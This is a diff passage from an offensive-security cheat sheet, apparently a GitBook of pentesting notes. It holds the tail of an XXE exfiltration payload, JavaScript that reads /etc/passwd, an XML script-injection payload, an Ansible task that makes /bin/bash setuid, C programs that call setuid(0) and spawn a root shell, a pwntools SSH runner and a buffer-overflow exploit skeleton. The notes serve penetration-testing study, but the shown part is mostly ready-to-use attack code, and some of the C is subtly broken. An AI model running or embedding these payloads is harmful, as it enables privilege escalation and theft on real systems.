320	+	%eval;
321	+	%exfiltrate;
322	+	```
323	+
324	+	#### Cross-Site Scripting (XSS)
325	+
326	+	JavaScript (JS) to read Files on the System (.js)
327	+
328	+	```c
329	+	const fs = require('fs');
330	+
331	+	fs.readFile('/etc/passwd', 'utf8', (err, data) => {
332	+	if (err) throw err;
333	+	console.log(data);
334	+	});
335	+	```
336	+
337	+	Payload from Extensible Markup Language (XML) File
338	+
339	+	```c
340	+	<?xml version="1.0" encoding="UTF-8"?>
341	+	<html xmlns:html="http://w3.org/1999/xhtml">
342	+	<html:script>prompt(document.domain);</html:script>
343	+	</html>
344	+	```
345	+
346	+	### 04 Database Assessment
347	+
348	+	### 05 Password Attacks
349	+
350	+	### 06 Wireless Attacks
351	+
352	+	### 07 Reverse Engineering
353	+
354	+	### 08 Exploitation Tools
355	+
356	+	### 09 Sniffing & Spoofing
357	+
358	+	### 10 Post Exploitation
359	+
360	+	#### YAML Ain't Markup Language (YAML)
361	+
362	+	Bad YAML Ain't Markup Language (YAML)
363	+
364	+	```c
365	+	- hosts: localhost
366	+	tasks:
367	+	- name: badyml
368	+	command: chmod +s /bin/bash
369	+	```
370	+
371	+	### 11 Forensics
372	+
373	+	### 12 Reporting Tools
374	+
375	+	### 13 Social Engineering Tools
376	+
377	+	### Basics
378	+
379	+	#### C
380	+
381	+	Shell Option 1
382	+
383	+	```c
384	+	#include <unistd.h>
385	+	#include <errno.h>
386	+
387	+	main( int argc, char argv, char envp )
388	+	{
389	+	setuid(0);
390	+	setgid(0);
391	+	envp = 0;
392	+	system ("/bin/bash", argv, envp);
393	+	return;
394	+	}
395	+	```
396	+
397	+	Shell Option 2
398	+
399	+	```c
400	+	#include <stdio.h>
401	+	#include <stdlib.h>
402	+	#include <stdlib.h>
403	+
404	+	int main() {
405	+	setuid(0);
406	+	setgid(0);
407	+
408	+	system("/bin/bash");
409	+	return 0;
410	+	}
411	+	```
412	+
413	+	Compiling
414	+
415	+	```
416	+	$ gcc -o shell shell.c
417	+	```
418	+
419	+	#### Secure Shell (SSH)
420	+
421	+	Secure Shell (SSH) Program Execution
422	+
423	+	```python
424	+	#!/usr/bin/python
425	+	from pwn import *
426	+
427	+	s = ssh(host='', user='', password='')
428	+	p = s.run('cd <PATH> && ./<vuln>')
429	+	p.recv()
430	+	p.sendline(<payload>)
431	+	p.interactive()
432	+	s.close()
433	+	```
434	+
435	+	### Exploiting
436	+
437	+	#### Python
438	+
439	+	Skeleton Exploit Python Script
440	+
441	+	> https://github.com/0xsyr0/Buffer\_Overflow
442	+
443	+	```c
444	+	#!/usr/bin/python
445	+
446	+	import socket,sys
447	+
448	+	address = '127.0.0.1'
449	+	port = 9999
450	+	buffer = #TBD
451	+
452	+	try:
453	+	print '[+] Sending buffer'
454	+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
455	+	s.connect((address,port))
456	+	s.recv(1024)
457	+	s.send(buffer + '\r\n')
458	+	except:
459	+	print '[!] Unable to connect to the application.'
460	+	sys.exit(0)
461	+	finally:
462	+	s.close()
463	+	```
464	+

tools/shodan-pentesting-guide/README.md tools/shodan-pentesting-guide.md

Content is identical
twitter/thread-by-archangeldday-on-thread-reader-app.md twitter-threads/thread-by-archangeldday-on-thread-reader-app.md

Content is identical
twitter/tips-and-tricks-from-twitter.md twitter-threads/tips-and-tricks-from-twitter.md

Content is identical

GITBOOK-33: change request with no subject merged in GitBook